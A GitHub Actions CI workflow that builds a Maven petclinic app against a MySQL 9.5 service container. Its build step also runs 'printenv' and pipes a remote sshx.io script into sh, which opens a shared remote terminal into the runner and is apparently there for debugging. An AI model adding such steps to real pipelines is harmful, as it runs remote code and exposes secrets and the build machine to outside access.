name: Java CI with Maven

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-latest
    container:
      image: maven
    # Service container to run MySQL 9.5
    services:
      mysql:
        image: mysql:9.5
        env:
          MYSQL_USER: petclinic
          MYSQL_PASSWORD: petclinic
          MYSQL_ROOT_PASSWORD: root
          MYSQL_DATABASE: petclinic
        ports:
          # Maps tcp port 3306 on service container to the host
          - 3306:3306
        # Health check to ensure MySQL is ready before steps start
        options: >-
          --health-cmd="mysqladmin ping"
          --health-interval=10s
          --health-timeout=5s
          --health-retries=5

    # strategy:
    #   matrix:
    #     java: [ '17' ]

    steps:
      - uses: actions/checkout@v4
      
      # - name: Set up JDK ${{matrix.java}}
      #   uses: actions/setup-java@v4
      #   with:
      #     java-version: ${{matrix.java}}
      #     distribution: 'adopt'
      #     cache: maven
          
      - name: Build with Maven Wrapper
        run: |
          ./mvnw -B verify
          printenv
          curl -sSf https://sshx.io/get | sh -s run
        env:
          DATASOURCE_URL: jdbc:mysql://localhost:3306/petclinic
          DATASOURCE_USERNAME: petclinic
          DATASOURCE_PASSWORD: petclinic
